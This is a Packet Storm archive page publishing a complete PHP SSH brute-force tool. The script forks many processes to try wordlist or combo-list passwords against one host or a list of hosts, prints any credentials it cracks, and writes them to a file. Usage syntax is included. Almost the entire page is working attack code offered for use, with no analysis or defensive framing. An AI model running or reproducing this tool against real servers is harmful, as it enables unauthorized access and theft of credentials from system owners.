ignore security and it'll go away

SSH Brute-Forcer Tool

SSH Brute-Forcer Tool
Posted May 12, 2013
Authored by miyachung

SSH brute-forcer tool written in PHP.

tags | cracker, php
MD5 | d2e079a4adce3ca69ec3dfe9527f85f7

SSH Brute-Forcer Tool

Change Mirror Download
<?php
/*
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
* SSH Brute-Forcer
* Written by Miyachung
* Homepage : http://janissaries.org
* Youtube Channel: http://www.youtube.com/janissariesorg
* Usage : http://www.youtube.com/watch?v=h5Fx3PBjUCg
* @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended)
* @@ This tool is using process forking system
* All rights reserved
* Contact with coder: miyachung@hotmail.com or jabber.org
*/
error_reporting(0);
/*
* Call the class
*/
$SSH = new SSHBruter();
/*
* Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed
* if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool
*/
if(!function_exists("ssh2_connect"))
{
$SSH->showErrorMsg(1);
}
elseif(!function_exists("pcntl_fork"))
{
$SSH->showErrorMsg(2);
}
/*
* Parse arguments
* There is 3 way to brute
* Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
* Combolist : -c <combolist> -o <output> -t <thread>
* Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
*/
$options_single = getopt("h:u:w:o:t:");
$options_combo = getopt("c:o:t:");
$options_multi = getopt("f:u:w:o:t:");
/*
* Does arguments control!
*/
if($options_single)
{
if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null)
{
$SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] );
}
else{
$SSH->showErrorMsg(3);
}
}
elseif($options_combo)
{
if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null)
{
$SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] );
}
else{
$SSH->showErrorMsg(3);
}
}
elseif($options_multi)
{
if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null)
{
$SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] );
}
else{
$SSH->showErrorMsg(3);
}
}
else
{
$SSH->showErrorMsg(3);
}

class SSHBruter
{
/*
* Prints 'MAIN_MESSAGE' if arguments used wrong
*/
const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n*********************************************\n";
/*
* Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found
*/
const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n";
/*
* Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found
*/
const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n";
/*
* Prints 'ARGMISS' if arguments not specified
*/
const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n";
/*
* Counts hosts & passwords , increments in foreach loop
*/
private $counter = 0;
/*
* Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
*/
function SingleBrute( $host , $user, $wordlist, $output , $thread )
{
echo "\n";
echo "Host: ".$host."\n";
echo "User: ".$user."\n\n";
$chunk_wordlist = array_chunk( file($wordlist) , $thread );
foreach($chunk_wordlist as $passwords)
{
foreach($passwords as $password)
{
$this->counter++;
$fork = pcntl_fork();
if(!$fork)
{
$perform_single = $this->SSH( $host , $user , trim($password) , $output );
if($perform_single)
{
print "Sleeping 120 seconds , PRESS CTRL + C NOW!";
sleep(120);
}
exit;
}
}
$this->waitForThreadFinish();
}

}
/*
* Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread>
*/
function ComboBrute( $combolist , $output , $thread )
{
$chunk_combolist = array_chunk( file($combolist) , $thread);
foreach($chunk_combolist as $combo)
{
foreach($combo as $hostuserpwd)
{
$this->counter++;
list($host,$user,$password) = split(":",trim($hostuserpwd));
$fork = pcntl_fork();
if(!$fork)
{
$this->SSH( $host , $user , $password , $output );
exit;
}

}
$this->waitForThreadFinish();
}

}
/*
* Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
*/
function MultiBrute( $hostlist , $user , $wordlist , $output , $thread )
{
foreach(file($hostlist) as $host)
{
$chunk_wordlist = array_chunk( file($wordlist) , $thread );
foreach($chunk_wordlist as $passwords)
{
foreach($passwords as $password)
{
$this->counter++;
$fork = pcntl_fork();
if(!$fork)
{
$this->SSH( trim($host) , $user , trim($password) , $output );
exit;
}

}
$this->waitForThreadFinish();
}
}
}
/*
* Performs login to host with specified user and password(s)
*/
function SSH( $host , $user , $password , $output , $port = 22 )
{
$connect = ssh2_connect( $host , $port );
if(!$connect)
{
print "[".$this->counter."] Host: ".$host." Connection Failed\n";
flush();
break;
}
else
{
$auth = ssh2_auth_password( $connect , $user , $password );
if($auth)
{
$a = "*********************************************\n";
$a.= "[+] Found!\n";
$a.= "[+] Host: ".$host."\n";
$a.= "[+] User: ".$user."\n";
$a.= "[+] Password: ".$password."\n";

print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n*********************************************\n";
self::SaveResult( $output , $a );
return true;
}
else
{
print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n";
flush();
break;
}

}

}
/*
* All error messages showing from there
*/
function showErrorMsg( $errno )
{
print self::MAIN_MESSAGE;
if($errno == 1)
{
print self::NOT_INSTALLED_SSH;
exit;
}
if($errno == 2)
{
print self::NOT_INSTALLED_PCNTL;
exit;
}
if($errno == 3)
{
print self::ARGMISS;
exit;
}

}
/*
* Waits for threads to finish
*/
function waitForThreadFinish()
{
while (pcntl_waitpid(0, $status) != -1) {
$status = pcntl_wexitstatus($status);
}
}
/*
* Saves everything with this function
*/
static function SaveResult( $output,$text )
{
$open_file = fopen( $output , "a" );
fwrite( $open_file , $text );
fclose( $open_file );
}
}

# miyachung represents / janissaries.org group
?>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close